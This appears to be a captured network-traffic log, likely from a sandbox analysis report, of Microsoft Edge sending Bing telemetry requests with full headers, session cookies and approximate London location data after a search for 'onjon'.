GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f101c2
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f101c3
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885347%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885348%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885352%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306885353%2C%22Name%22%3A510%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885355%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306885358%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885361%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885362%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885362%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885347%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885348%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885352%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306885353%2C%22Name%22%3A510%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885355%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306885358%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885361%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885362%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885362%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1733306885363%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

cache-control: private
content-length: 206
content-type: text/html; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a0e14b94f68b4bc84a461a53eea
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-5Gal7rJrm682jEYlalepP4IaHlI1jZ96ttTwkW2eLZQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: D48357E3A521480DA95A46BB72E3FBE9 Ref B: LON212050703025 Ref C: 2024-12-04T10:08:14Z
date: Wed, 04 Dec 2024 10:08:14 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:14 GMT; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:14 GMT; path=/; secure; SameSite=None
set-cookie: SRCHS=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: SRCHS=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f10144
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1733306885366%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f1038f
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1733306885754%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1733306885754%2C%22Name%22%3A%22WriteEffectiveLocationSuccess%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f104b7
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%225%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%225%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f104b6
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
